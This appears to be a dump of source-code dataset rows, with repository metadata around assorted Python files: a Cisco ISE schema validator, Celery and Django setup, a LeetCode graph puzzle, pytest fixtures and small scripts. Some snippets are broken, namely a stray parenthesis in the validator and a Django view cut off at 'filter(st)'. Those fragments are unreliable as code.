        'date_added': datetime(2005, 1, 1, 0, 0),
        'email': u'bar@bar.com',
        'id': 1,
        'name': None,
        'password': u'foobar'
    })
| [
"gabriel@nacaolivre.org"
] | gabriel@nacaolivre.org |
d2b6c214a809b88c7e0670089891752e488a98bf | 4e30d990963870478ed248567e432795f519e1cc | /ciscoisesdk/models/validators/v3_1_1/jsd_d0ee193cc65780af11ed96b1758755.py | b8fdbb93fe7fa8f08ca7035bf6c68d28a611e89f | [
"MIT"
] | permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 3,583 | py | # -*- coding: utf-8 -*-
"""Identity Services Engine registerNode data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755(object):
    """registerNode request schema definition."""
    def __init__(self):
        super(JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755, self).__init__()
        # Compile the schema once at construction time; the .replace()
        # strips the 16-space source indentation from the embedded literal
        # before json.loads parses it.
        self._validator = fastjsonschema.compile(json.loads(
            '''{
                "$schema": "http://json-schema.org/draft-04/schema#",
                "properties": {
                "allowCertImport": {
                "type": "boolean"
                },
                "fqdn": {
                "type": "string"
                },
                "password": {
                "type": "string"
                },
                "roles": {
                "items": {
                "enum": [
                "PrimaryAdmin",
                "PrimaryDedicatedMonitoring",
                "PrimaryMonitoring",
                "SecondaryAdmin",
                "SecondaryDedicatedMonitoring",
                "SecondaryMonitoring",
                "Standalone"
                ],
                "type": "string"
                },
                "type": "array"
                },
                "services": {
                "items": {
                "enum": [
                "DeviceAdmin",
                "PassiveIdentity",
                "Profiler",
                "SXP",
                "Session",
                "TC-NAC",
                "pxGrid",
                "pxGridCloud"
                ],
                "type": "string"
                },
                "type": "array"
                },
                "userName": {
                "type": "string"
                }
                },
                "required": [
                "allowCertImport",
                "fqdn",
                "password",
                "roles",
                "services",
                "userName"
                ],
                "type": "object"
                }'''.replace("\n" + ' ' * 16, '')
        ))

    def validate(self, request):
        """Validate `request` against the registerNode schema.

        Raises MalformedRequest (wrapping the fastjsonschema message)
        when the payload does not conform.
        """
        try:
            self._validator(request)
        except fastjsonschema.exceptions.JsonSchemaException as e:
            raise MalformedRequest(
                '{} is invalid. Reason: {}'.format(request, e.message)
            )
)
| [
"wastorga@altus.co.cr"
] | wastorga@altus.co.cr |
5b67a2791270a6af0fcb24d49ab43ac438bc7ae7 | 055f4cc4d565b33d76c1f87c0dfe02f67328a3c9 | /celery_snippet/celery_snippet/celery.py | b9d9290076e141092c5ad792b1ebf785e5120dec | [] | no_license | Sundarmax/python-celery-django | 0eb4ac38df69bcaa9fed4f7c3f28b1904bb21fcc | 3b0c47cee80056dae36d970a3ceb774f279548eb | refs/heads/master | 2023-04-02T14:47:01.628356 | 2021-04-08T10:23:41 | 2021-04-08T10:23:41 | 355,795,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
# Make sure Django settings are importable before Celery configures itself.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'celery_snippet.settings')
app = Celery('celery_snippet')
# Pull all CELERY_* keys from Django settings (the namespace strips the prefix).
app.config_from_object('django.conf:settings', namespace='CELERY')
# Auto-discover task modules in the installed Django apps.
app.autodiscover_tasks()
| [
"sundar.info22@gmail.com"
] | sundar.info22@gmail.com |
c9efe071470bec0e0fd25716ccb12f14514f472e | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/928/original/928.minimize-malware-spread-ii.0.py | f3b1e244ce25969bd413823d5bb20f56702a671e | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 1,960 | py | #
# @lc app=leetcode id=928 lang=python3
#
# [928] Minimize Malware Spread II
#
# https://leetcode.com/problems/minimize-malware-spread-ii/description/
#
# algorithms
# Hard (38.10%)
# Total Accepted: 3K
# Total Submissions: 7.8K
# Testcase Example: '[[1,1,0],[1,1,0],[0,0,1]]\n[0,1]'
#
# (This problem is the same as Minimize Malware Spread, with the differences
# bolded.)
#
# In a network of nodes, each node i is directly connected to another node j if
# and only if graph[i][j] = 1.
#
# Some nodes initial are initially infected by malware. Whenever two nodes are
# directly connected and at least one of those two nodes is infected by
# malware, both nodes will be infected by malware. This spread of malware will
# continue until no more nodes can be infected in this manner.
#
# Suppose M(initial) is the final number of nodes infected with malware in the
# entire network, after the spread of malware stops.
#
# We will remove one node from the initial list, completely removing it and any
# connections from this node to any other node. Return the node that if
# removed, would minimize M(initial). If multiple nodes could be removed to
# minimize M(initial), return such a node with the smallest index.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: graph = [[1,1,0],[1,1,0],[0,0,1]], initial = [0,1]
# Output: 0
#
#
#
# Example 2:
#
#
# Input: graph = [[1,1,0],[1,1,1],[0,1,1]], initial = [0,1]
# Output: 1
#
#
#
# Example 3:
#
#
# Input: graph = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], initial = [0,1]
# Output: 1
#
#
#
#
# Note:
#
#
# 1 < graph.length = graph[0].length <= 300
# 0 <= graph[i][j] == graph[j][i] <= 1
# graph[i][i] = 1
# 1 <= initial.length < graph.length
# 0 <= initial[i] < graph.length
#
#
#
#
#
class Solution:
    def minMalwareSpread(self, graph, initial):
        """Return the initially-infected node whose complete removal (node
        plus all its edges) minimizes the final number of infected nodes;
        on ties, the smallest index.

        :type graph: List[List[int]]  adjacency matrix (graph[i][j] == 1)
        :type initial: List[int]      initially infected nodes
        :rtype: int

        Brute force: for each candidate, simulate the spread with that
        node deleted.  O(len(initial) * n^2), fine for n <= 300.  The
        original body was an empty stub.
        """
        n = len(graph)
        best_node = min(initial)
        best_infected = n + 1
        # iterate in ascending order so ties keep the smallest index
        for removed in sorted(initial):
            # DFS from every remaining infected node; `removed` is treated
            # as deleted, so traversal never enters it.
            seen = {removed}
            stack = [node for node in initial if node != removed]
            seen.update(stack)
            while stack:
                u = stack.pop()
                for v in range(n):
                    if graph[u][v] and v not in seen:
                        seen.add(v)
                        stack.append(v)
            infected = len(seen) - 1  # `removed` itself is not infected
            if infected < best_infected:
                best_infected = infected
                best_node = removed
        return best_node
| [
"frankie.y.liu@gmail.com"
] | frankie.y.liu@gmail.com |
cf18022549aef20a26f2714caf5b93d8f7efabc5 | af7df9d77a2545b54d8cd03e7f4633dce6125f4a | /ch01/dump_db_file.py | 08c49f7df3fa12cf40a63f58a162267690e31ca1 | [] | no_license | socrates77-sh/PP4E | 71e6522ea2e7cfd0c68c1e06ceb4d0716cc0f0bd | c92e69aea50262bfd63e95467ae4baf7cdc2f22f | refs/heads/master | 2020-05-29T08:46:47.380002 | 2018-11-16T10:38:44 | 2018-11-16T10:38:44 | 69,466,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | # -*- coding: utf-8 -*-
from make_db_file import loadDbase
# Load the database produced by make_db_file and print every record.
db=loadDbase()
for key in db:
    print(key, '=>\n', db[key])
# spot-check one nested field
print(db['sue']['name'])
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
80904623674486b0b93747232379e3d88873ba80 | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/core/migrations/0025_delete_old_resources.py | 77fb7080cd64397347c6dd06423d07ea64ccfdb9 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 494 | py | # Generated by Django 3.2.8 on 2021-10-25 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: deletes the legacy FileResource and TikaResource
    models, removing TikaResource.retainer_type first."""

    dependencies = [
        ('core', '0024_pdf_thumbnails'),
    ]

    operations = [
        # field removed before its model is deleted below
        migrations.RemoveField(
            model_name='tikaresource',
            name='retainer_type',
        ),
        migrations.DeleteModel(
            name='FileResource',
        ),
        migrations.DeleteModel(
            name='TikaResource',
        ),
    ]
| [
"email@fakoberkers.nl"
] | email@fakoberkers.nl |
69fd3114d948b6199a0cea0eb3d2011db1a66155 | 5eb52c07e5b1bd00af77306f927f382b684cd6ff | /indy_node/test/pool_config/conftest.py | d7be1101c2ac8cde5ad4580c819339cd86ec230f | [
"Apache-2.0"
] | permissive | hyperledger/indy-node | bce39486988f5114581cff4f6d14fc1b7684143c | e6bb87d4c605aff9914491d062248b6ec857334c | refs/heads/main | 2023-09-03T15:33:08.187153 | 2023-05-08T22:48:21 | 2023-05-08T22:48:21 | 77,021,566 | 691 | 783 | Apache-2.0 | 2023-05-09T15:42:43 | 2016-12-21T05:45:04 | Python | UTF-8 | Python | false | false | 812 | py | import pytest
from indy_node.test.pool_config.helper import sdk_ensure_pool_config_sent
def genPoolConfig(writes: bool, force: bool):
    """Build a pool-config payload with the given writes/force flags."""
    return {'writes': writes, 'force': force}
@pytest.fixture(scope='module')
def poolConfigWTFF():
    # writes enabled, not forced ("WTFF" encodes Writes True, Force False)
    return genPoolConfig(writes=True, force=False)
@pytest.fixture(scope='module')
def poolConfigWFFF():
    # writes disabled, not forced
    return genPoolConfig(writes=False, force=False)
@pytest.fixture(scope='module')
def poolConfigWTFT():
    # writes enabled, forced
    return genPoolConfig(writes=True, force=True)
@pytest.fixture(scope='module')
def poolConfigWFFT():
    # writes disabled, forced
    return genPoolConfig(writes=False, force=True)
@pytest.fixture(scope="module")
def poolConfigSent(looper, nodeSet, sdk_pool_handle, sdk_wallet_trustee, poolCfg):
    # sends poolCfg to the pool and waits until it takes effect
    sdk_ensure_pool_config_sent(looper, sdk_pool_handle, sdk_wallet_trustee, poolCfg)
| [
"alexander.sherbakov@dsr-company.com"
] | alexander.sherbakov@dsr-company.com |
6afe4beed95660164eed8effffbe691f3fba898e | fca336a7d3ac6e314179f47f72a33021eb9fcde2 | /python/20.py | b696b6cc527a3ba4eceb7c5cc26c3ac15db08d8a | [] | no_license | iamFIREcracker/project-euler | e84adfdcdcf2859f9fd2e57670110f5a7022f074 | 5dc50d9b1b41761b95e14a49e3ab9a80e4498657 | refs/heads/master | 2021-07-11T11:44:38.453475 | 2017-10-15T16:36:05 | 2017-10-15T16:36:05 | 107,029,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | """Find the sum of the digits in the number 100!
"""
import operator
print sum([int(c) for c in str(reduce(operator.mul,
[i for i in xrange(1, 101)]))])
| [
"matteo@matteolandi.net"
] | matteo@matteolandi.net |
0010ddf6c6cc7080f556ea0f9f88f801902a9897 | 11d75881f729dc5e9ca08bfe6adae0fd64098056 | /dazzler/system/__init__.py | 13121628e6b1dffbb55124890f3bf3201073901a | [
"MIT"
] | permissive | jbampton/dazzler | b918723c4fd1f0015153247345156007581b0520 | 4018f6cbcb55a9f482cb5c5cbf6a06b063c15e21 | refs/heads/master | 2023-03-08T12:18:13.847188 | 2021-06-19T22:29:54 | 2021-06-20T13:23:18 | 218,608,116 | 1 | 0 | MIT | 2023-03-06T19:00:08 | 2019-10-30T19:38:15 | Python | UTF-8 | Python | false | false | 1,337 | py | """
Dazzler systems (API)
- Requirements are JS/CSS resources to include on rendering.
- Packages hold components info and it's requirements.
- Component Aspects are shared between backend and frontend with bindings.
- Generate components with ``dazzler generate metadata.json output_dir``
- Page holds meta data for rendering, requirements, routes, layout, bindings.
"""
from ._component import Component, Aspect # noqa: F401
from ._binding import * # noqa: F401, F403
from ._package import Package # noqa: F401
from ._requirements import ( # noqa: F401
Requirement,
RequirementWarning,
assets_to_requirements,
collect_requirements,
)
from ._generator import generate_components, generate_meta # noqa: F401
from ._undefined import UNDEFINED, Undefined # noqa: F401
from ._page import Page # noqa: F401
from ._middleware import Middleware # noqa: F401
from ._route import Route, RouteMethod # noqa: F401
# Explicit public API of the dazzler.system package.  Some of these names
# (BindingContext, Binding, Trigger, State, BoundAspect) arrive via the
# `from ._binding import *` star import above, hence the F405 suppression.
__all__ = [ # noqa: F405
    'Component',
    'Aspect',
    'BindingContext',
    'Binding',
    'Trigger',
    'State',
    'BoundAspect',
    'Package',
    'Requirement',
    'RequirementWarning',
    'assets_to_requirements',
    'collect_requirements',
    'generate_components',
    'generate_meta',
    'UNDEFINED',
    'Undefined',
    'Page',
    'Middleware',
    'Route',
    'RouteMethod',
]
| [
"t4rk@outlook.com"
] | t4rk@outlook.com |
4e9c8e1528a41a397fcd5edc6922892c841935c6 | 37d2a09c274ce31f1e6f690c234c3447d4708d6a | /staicoin/cmds/units.py | d30bcc831278333eb79b7ac1af62fb23f2833875 | [
"Apache-2.0"
] | permissive | jzblanco/staicoin-blockchain | 60aedc566f475922e845ea019f2d8468f510a947 | 75a148429f6d39c36802c83b928ad8effbfc56a8 | refs/heads/main | 2023-08-17T13:11:46.094703 | 2021-10-08T23:13:49 | 2021-10-08T23:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from typing import Dict
# The rest of the codebase uses mojos everywhere.
# Only use these units for user facing interfaces.
units: Dict[str, int] = {
    # 1 staicoin (stai) is 1,000,000,000 mojo (1 billion)
    "staicoin": 10 ** 9,
    # BUGFIX: the canonical key is "mojo"; the original only defined the
    # typo'd "mojo:".  Both are kept so existing lookups keep working.
    "mojo": 1,
    "mojo:": 1,  # deprecated typo alias -- do not use in new code
    # 1 coloured coin is 1000 colouredcoin mojos
    "colouredcoin": 10 ** 3,
}
| [
"em@iguru.team"
] | em@iguru.team |
77bd0747f7d7fc145ab0b45eefafd6f638002f18 | 72ec201effe17c3875f3d26ab98d6e56f808b0ac | /aoomuki_comp/app/migrations/0047_auto_20210202_1646.py | ad2ed545f6323c217246556f94f308312325f1d1 | [
"MIT"
] | permissive | Kamelgasmi/aoomuki_competences | 549f9c9167f82d084ef6048cec72e87fe90f4c35 | e02f3546f7efb54b825dbcfab968296607775903 | refs/heads/master | 2023-04-06T17:48:35.921460 | 2021-04-16T08:49:15 | 2021-04-16T08:49:15 | 330,929,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | # Generated by Django 3.1.5 on 2021-02-02 15:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app', '0046_auto_20210202_1147'),
]
operations = [
migrations.RemoveField(
model_name='listofcompetence',
name='Collaborater',
),
migrations.AddField(
model_name='listofcompetence',
name='User',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Utilisateur'),
),
]
| [
"kam_7@hotmail.fr"
] | kam_7@hotmail.fr |
dfd731d95d35d7ba3ca64ab77bed8a8cf155b40b | 950884cea2a67bc2047c8a7c278d1cbf7f657b29 | /submits.2015/14_57_48_33_1_8767.py | ce10341e2c19add871a9204b5ab9e64b55c845fd | [] | no_license | lisiynos/loo2015 | ac5bd8d1d81c301be0e65960c3707506120f0b7f | cf3d12589c9e586921c2a38554103fc1c7652abe | refs/heads/master | 2020-12-25T17:35:50.917577 | 2016-08-29T09:31:40 | 2016-08-29T09:31:40 | 29,869,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | with open('hall.in', 'r') as infile:
a, b, c, d = [int(x) for x in infile.readline().split()]
hall_counter = 0
for x in range(1, b + 1):
for y in range(1, b + 1):
if c <= (x + y) * 2 <= d and a <= x * y <= b:
hall_counter += 1
hall_counter = str(int((hall_counter + 1)/2))
with open('hall.out', 'w') as outfile:
outfile.write(hall_counter) | [
"super.denis@gmail.com"
] | super.denis@gmail.com |
0ec0747aea6f065bfb873f5d9291c4687494bf7b | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project2/Project2/.history/blog/views_20211114183757.py | 5bdf30cc1996d4f9f8116bb63430e3540af0ba18 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 212 | py | from django.shortcuts import render, get_object_or_404
from .models import Blog
from django.views import generic
# Create your views here.
class BlogList(generic.ListView):
queryset = Blog.objects.filter(st) | [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
2a75f41f27e37ffea0a9f08cd9194e665ffb1f11 | fcbedcc2f7483a4b3ce9111c9c889bd4a5079496 | /sql/sqlg.py | 899817382ff5aeea50f67d3d8c32f2d871fad008 | [] | no_license | kevlab/RealPython2 | aab94de91d0824290bfce4a318f57f4fe5282f19 | a85f92563b414830431a79d2448682da0c12d645 | refs/heads/master | 2021-01-10T19:10:46.035344 | 2015-05-27T02:24:48 | 2015-05-27T02:24:48 | 31,555,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | # UPDATE and DELETE statements
import sqlite3
with sqlite3.connect('new.db') as connection:
c = connection.cursor()
# update
c.execute("""UPDATE population SET population = 9000000 WHERE
city ='New York City'""")
# delete
c.execute("DELETE FROM population WHERE city='Boston'")
print "\nNEW DATA:\n"
c.execute("SELECT * FROM population")
rows = c.fetchall()
for r in rows:
print r[0], r[1], r[2]
| [
"greenleaf1348@gmail.com"
] | greenleaf1348@gmail.com |
84e69319d015573313a7536fe6d36c82f50e5297 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetcodePythonProject/leetcode_0001_0050/LeetCode003_LongestSubstingWithoutRepeatingCharacters.py | 7161fed14178c544c2c29ac5762c77a963af8832 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 828 | py | '''
Created on May 5, 2017
@author: MT
'''
class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
left = 0
hashset = set()
maxLen = 0
for i, c in enumerate(s):
while left < i and c in hashset:
hashset.discard(s[left])
left += 1
hashset.add(c)
maxLen = max(maxLen, i-left+1)
return maxLen
def test(self):
testCases = [
'abc',
'bbbb',
'abcdba',
]
for s in testCases:
print('s: %s' % s)
result = self.lengthOfLongestSubstring(s)
print('result: %s' % result)
print('-='*30+'-')
if __name__ == '__main__':
Solution().test()
| [
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
b55e6344c718b94dc01be9ce249c8634c25f9516 | 7fbb4f70493a27d2b0fe2c107a1055e493bf7188 | /taobao-tianmao/top/api/rest/TmallExchangeMessagesGetRequest.py | 67817273e9db4bf66611b203f8cb229606beb032 | [
"Apache-2.0"
] | permissive | ScottLeeF/python-example | da9d78a85cce914153f1c5ad662d28cddde0fc0f | 0b230ba80fe5020d70329a9d73e058013f0ca111 | refs/heads/master | 2022-12-03T00:24:47.035304 | 2020-04-21T09:51:12 | 2020-04-21T09:51:12 | 242,459,649 | 0 | 0 | Apache-2.0 | 2022-11-22T05:29:21 | 2020-02-23T05:03:19 | Python | UTF-8 | Python | false | false | 471 | py | '''
Created by auto_sdk on 2018.08.09
'''
from top.api.base import RestApi
class TmallExchangeMessagesGetRequest(RestApi):
def __init__(self, domain='gw.api.taobao.com', port=80):
RestApi.__init__(self, domain, port)
self.dispute_id = None
self.fields = None
self.operator_roles = None
self.page_no = None
self.page_size = None
def getapiname(self):
return 'tmall.exchange.messages.get'
| [
"fei.li@tuanche.com"
] | fei.li@tuanche.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.